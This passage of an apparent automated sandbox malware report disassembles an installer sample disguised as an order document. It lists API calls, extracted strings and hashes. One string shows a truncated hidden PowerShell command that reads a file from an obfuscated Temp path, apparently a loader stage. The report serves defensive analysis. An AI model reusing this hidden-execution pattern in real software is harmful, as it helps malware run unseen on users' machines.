                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                            • Instruction ID: db5d81fcbfa5be4a2d8af1487b95e9640f9c883cb1993a3fcb30b22963867ec5
                                                                            • Opcode Fuzzy Hash: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                            • Instruction Fuzzy Hash: 87F17871D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45
                                                                            Function 0040689E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 786 40689e-4068b2 FindFirstFileW 787 4068b4-4068bd FindClose 786->787 788 4068bf 786->788 789 4068c1-4068c2 787->789 788->789
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(75923420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
                                                                            • FindClose.KERNEL32(00000000), ref: 004068B5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID: X_B
                                                                            • API String ID: 2295610775-941606717
                                                                            • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                            • Instruction ID: f67f359cedd367be1f2f51a398ada2a6aadcf11014009cc1af4821528039bb17
                                                                            • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                            • Instruction Fuzzy Hash: 68D0123251A5205BC64067396E0C84B7B58AF153717268A36F5AAF21E0CB348C6A969C
                                                                            Function 00403FC1 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 202 403fc1-403fd3 203 403fd9-403fdf 202->203 204 40413a-404149 202->204 203->204 205 403fe5-403fee 203->205 206 404198-4041ad 204->206 207 40414b-404193 GetDlgItem * 2 call 4044c0 SetClassLongW call 40140b 204->207 208 403ff0-403ffd SetWindowPos 205->208 209 404003-40400a 205->209 211 4041ed-4041f2 call 40450c 206->211 212 4041af-4041b2 206->212 207->206 208->209 214 40400c-404026 ShowWindow 209->214 215 40404e-404054 209->215 220 4041f7-404212 211->220 217 4041b4-4041bf call 401389 212->217 218 4041e5-4041e7 212->218 221 404127-404135 call 404527 214->221 222 40402c-40403f GetWindowLongW 214->222 223 404056-404068 DestroyWindow 215->223 224 40406d-404070 215->224 217->218 243 4041c1-4041e0 SendMessageW 217->243 218->211 219 40448d 218->219 231 40448f-404496 219->231 228 404214-404216 call 40140b 220->228 229 40421b-404221 220->229 221->231 222->221 230 404045-404048 ShowWindow 222->230 232 40446a-404470 223->232 234 404072-40407e SetWindowLongW 224->234 235 404083-404089 224->235 228->229 240 404227-404232 229->240 241 40444b-404464 DestroyWindow EndDialog 229->241 230->215 232->219 239 404472-404478 232->239 234->231 235->221 242 40408f-40409e GetDlgItem 235->242 239->219 244 40447a-404483 ShowWindow 239->244 240->241 245 404238-404285 call 40657e call 4044c0 * 3 GetDlgItem 240->245 241->232 246 4040a0-4040b7 SendMessageW IsWindowEnabled 242->246 247 4040bd-4040c0 242->247 243->231 244->219 274 404287-40428c 245->274 275 40428f-4042cb ShowWindow KiUserCallbackDispatcher call 4044e2 EnableWindow 245->275 246->219 246->247 249 4040c2-4040c3 247->249 250 4040c5-4040c8 247->250 251 4040f3-4040f8 call 404499 249->251 252 4040d6-4040db 250->252 253 4040ca-4040d0 250->253 251->221 255 404111-404121 SendMessageW 252->255 257 4040dd-4040e3 252->257 253->255 256 4040d2-4040d4 253->256 255->221 256->251 260 4040e5-4040eb call 40140b 257->260 261 4040fa-404103 call 40140b 257->261 270 4040f1 260->270 261->221 271 404105-40410f 261->271 270->251 271->270 274->275 278 4042d0 275->278 279 4042cd-4042ce 275->279 280 4042d2-404300 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404302-404313 SendMessageW 280->281 282 404315 280->282 283 40431b-40435a call 4044f5 call 403fa2 call 406541 lstrlenW call 40657e SetWindowTextW call 401389 281->283 282->283 283->220 294 404360-404362 283->294 294->220 295 404368-40436c 294->295 296 40438b-40439f DestroyWindow 295->296 297 40436e-404374 295->297 296->232 299 4043a5-4043d2 CreateDialogParamW 296->299 297->219 298 40437a-404380 297->298 298->220 300 404386 298->300 299->232 301 4043d8-40442f call 4044c0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->301 300->219 301->219 306 404431-404444 ShowWindow call 40450c 301->306 308 404449 306->308 308->232
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FFD
                                                                            • ShowWindow.USER32(?), ref: 0040401D
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040402F
                                                                            • ShowWindow.USER32(?,00000004), ref: 00404048
                                                                            • DestroyWindow.USER32 ref: 0040405C
                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404075
                                                                            • GetDlgItem.USER32(?,?), ref: 00404094
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040A8
                                                                            • IsWindowEnabled.USER32(00000000), ref: 004040AF
                                                                            • GetDlgItem.USER32(?,00000001), ref: 0040415A
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404164
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040417E
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041CF
                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404275
                                                                            • ShowWindow.USER32(00000000,?), ref: 00404296
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042A8
                                                                            • EnableWindow.USER32(?,?), ref: 004042C3
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042D9
                                                                            • EnableMenuItem.USER32(00000000), ref: 004042E0
                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042F8
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040430B
                                                                            • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404335
                                                                            • SetWindowTextW.USER32(?,00422F08), ref: 00404349
                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040447D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                            • String ID:
                                                                            • API String ID: 121052019-0
                                                                            • Opcode ID: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                            • Instruction ID: f4824fcfb4375dbde2e3aa314f90dcffafac0cdac9d9fdfce080a9e5a5e1030c
                                                                            • Opcode Fuzzy Hash: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                            • Instruction Fuzzy Hash: E7C1CEB1600200BBCB216F61EE49E2B3A68FB95719F41053EF751B11F0CB795882DB2E
                                                                            Function 00403C13 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 309 403c13-403c2b call 406935 312 403c2d-403c3d call 406488 309->312 313 403c3f-403c76 call 40640f 309->313 322 403c99-403cc2 call 403ee9 call 405f18 312->322 318 403c78-403c89 call 40640f 313->318 319 403c8e-403c94 lstrcatW 313->319 318->319 319->322 327 403d54-403d5c call 405f18 322->327 328 403cc8-403ccd 322->328 334 403d6a-403d8f LoadImageW 327->334 335 403d5e-403d65 call 40657e 327->335 328->327 329 403cd3-403cfb call 40640f 328->329 329->327 336 403cfd-403d01 329->336 338 403e10-403e18 call 40140b 334->338 339 403d91-403dc1 RegisterClassW 334->339 335->334 340 403d13-403d1f lstrlenW 336->340 341 403d03-403d10 call 405e3d 336->341 350 403e22-403e2d call 403ee9 338->350 351 403e1a-403e1d 338->351 342 403dc7-403e0b SystemParametersInfoW CreateWindowExW 339->342 343 403edf 339->343 348 403d21-403d2f lstrcmpiW 340->348 349 403d47-403d4f call 405e10 call 406541 340->349 341->340 342->338 347 403ee1-403ee8 343->347 348->349 354 403d31-403d3b GetFileAttributesW 348->354 349->327 362 403e33-403e4d ShowWindow call 4068c5 350->362 363 403eb6-403eb7 call 405699 350->363 351->347 357 403d41-403d42 call 405e5c 354->357 358 403d3d-403d3f 354->358 357->349 358->349 358->357 370 403e59-403e6b GetClassInfoW 362->370 371 403e4f-403e54 call 4068c5 362->371 366 403ebc-403ebe 363->366 368 403ec0-403ec6 366->368 369 403ed8-403eda call 40140b 366->369 368->351 372 403ecc-403ed3 call 40140b 368->372 369->343 375 403e83-403ea6 DialogBoxParamW call 40140b 370->375 376 403e6d-403e7d GetClassInfoW RegisterClassW 370->376 371->370 372->351 380 403eab-403eb4 call 403b63 375->380 376->375 380->347
                                                                            APIs
                                                                              • Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                                              • Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                            • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\order CF08093-24.exe",00008001), ref: 00403C94
                                                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420), ref: 00403D14
                                                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D27
                                                                            • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D32
                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes), ref: 00403D7B
                                                                              • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                                            • RegisterClassW.USER32(004289C0), ref: 00403DB8
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DD0
                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E05
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403E3B
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E67
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E74
                                                                            • RegisterClassW.USER32(004289C0), ref: 00403E7D
                                                                            • DialogBoxParamW.USER32(?,00000000,00403FC1,00000000), ref: 00403E9C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: "C:\Users\user\Desktop\order CF08093-24.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                            • API String ID: 1975747703-2419641765
                                                                            • Opcode ID: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                                                            • Instruction ID: 5b9c441e0465166458f669e0e2db1e5d0b29f952519833dd96bf398df7fa21fd
                                                                            • Opcode Fuzzy Hash: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                                                            • Instruction Fuzzy Hash: E661D570600300BAD620AF66DD46F3B3A7CEB84B49F81453FF941B61E2CB795952CA6D
                                                                            Function 004030A2 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 383 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406031 386 4030f2-4030f7 383->386 387 4030fc-40312a call 406541 call 405e5c call 406541 GetFileSize 383->387 388 4032d2-4032d6 386->388 395 403130 387->395 396 403215-403223 call 40303e 387->396 397 403135-40314c 395->397 402 403225-403228 396->402 403 403278-40327d 396->403 399 403150-403159 call 4034be 397->399 400 40314e 397->400 409 40327f-403287 call 40303e 399->409 410 40315f-403166 399->410 400->399 405 40322a-403242 call 4034d4 call 4034be 402->405 406 40324c-403276 GlobalAlloc call 4034d4 call 4032d9 402->406 403->388 405->403 429 403244-40324a 405->429 406->403 434 403289-40329a 406->434 409->403 413 4031e2-4031e6 410->413 414 403168-40317c call 405fec 410->414 418 4031f0-4031f6 413->418 419 4031e8-4031ef call 40303e 413->419 414->418 432 40317e-403185 414->432 425 403205-40320d 418->425 426 4031f8-403202 call 406a22 418->426 419->418 425->397 433 403213 425->433 426->425 429->403 429->406 432->418 438 403187-40318e 432->438 433->396 435 4032a2-4032a7 434->435 436 40329c 434->436 439 4032a8-4032ae 435->439 436->435 438->418 440 403190-403197 438->440 439->439 441 4032b0-4032cb SetFilePointer call 405fec 439->441 440->418 442 403199-4031a0 440->442 445 4032d0 441->445 442->418 444 4031a2-4031c2 442->444 444->403 446 4031c8-4031cc 444->446 445->388 447 4031d4-4031dc 446->447 448 4031ce-4031d2 446->448 447->418 449 4031de-4031e0 447->449 448->433 448->447 449->418
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 004030B3
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030CF
                                                                              • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                              • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040311B
                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                                                            Strings
                                                                            • "C:\Users\user\Desktop\order CF08093-24.exe", xrefs: 004030A8
                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
                                                                            • Error launching installer, xrefs: 004030F2
                                                                            • soft, xrefs: 00403190
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004030A9
                                                                            • Null, xrefs: 00403199
                                                                            • C:\Users\user\Desktop, xrefs: 004030FD, 00403102, 00403108
                                                                            • Inst, xrefs: 00403187
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                            • String ID: "C:\Users\user\Desktop\order CF08093-24.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                            • API String ID: 2803837635-19654962
                                                                            • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                            • Instruction ID: 0f45a59523ef10b9f6d61eaf83b2f91e1f12d324a613ce28672a4e7bf9d48b30
                                                                            • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                            • Instruction Fuzzy Hash: 7B51B071A01304AFDB209F65DD86B9E7FACAB08356F20417BF504B62D1CB789E818B5D
                                                                            Function 0040657E Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 204stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 450 40657e-406587 451 406589-406598 450->451 452 40659a-4065b4 450->452 451->452 453 4067c4-4067ca 452->453 454 4065ba-4065c6 452->454 456 4067d0-4067dd 453->456 457 4065d8-4065e5 453->457 454->453 455 4065cc-4065d3 454->455 455->453 459 4067e9-4067ec 456->459 460 4067df-4067e4 call 406541 456->460 457->456 458 4065eb-4065f4 457->458 461 4067b1 458->461 462 4065fa-40663d 458->462 460->459 464 4067b3-4067bd 461->464 465 4067bf-4067c2 461->465 466 406643-40664f 462->466 467 406755-406759 462->467 464->453 465->453 468 406651 466->468 469 406659-40665b 466->469 470 40675b-406762 467->470 471 40678d-406791 467->471 468->469 474 406695-406698 469->474 475 40665d-406683 call 40640f 469->475 472 406772-40677e call 406541 470->472 473 406764-406770 call 406488 470->473 476 4067a1-4067af lstrlenW 471->476 477 406793-40679c call 40657e 471->477 488 406783-406789 472->488 473->488 481 40669a-4066a6 GetSystemDirectoryW 474->481 482 4066ab-4066ae 474->482 491 406689-406690 call 40657e 475->491 492 40673d-406740 475->492 476->453 477->476 489 406738-40673b 481->489 484 4066c0-4066c4 482->484 485 4066b0-4066bc GetWindowsDirectoryW 482->485 484->489 490 4066c6-4066e4 484->490 485->484 488->476 493 40678b 488->493 489->492 494 40674d-406753 call 4067ef 489->494 497 4066e6-4066ec 490->497 498 4066f8-406710 call 406935 490->498 491->489 492->494 495 406742-406748 lstrcatW 492->495 493->494 494->476 495->494 503 4066f4-4066f6 497->503 507 406712-406725 SHGetPathFromIDListW CoTaskMemFree 498->507 508 406727-406730 498->508 503->498 505 406732-406736 503->505 505->489 507->505 507->508 508->490 508->505
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066A0
                                                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 004066B6
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406714
                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040671D
                                                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 00406748
                                                                            • lstrlenW.KERNEL32(: Completed,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 004067A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                            • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$daniglacial$powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprm
                                                                            • API String ID: 4024019347-2235894875
                                                                            • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                            • Instruction ID: 9d84e59ac7151f7caf92dcd2fae633819e279481621c74ff0a59597acd22528a
                                                                            • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                            • Instruction Fuzzy Hash: 46612471A047119BD7209F28DC80B7A77E4AF58328F65053FF686B32D0DA3C89A5875E
                                                                            Function 00401794 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
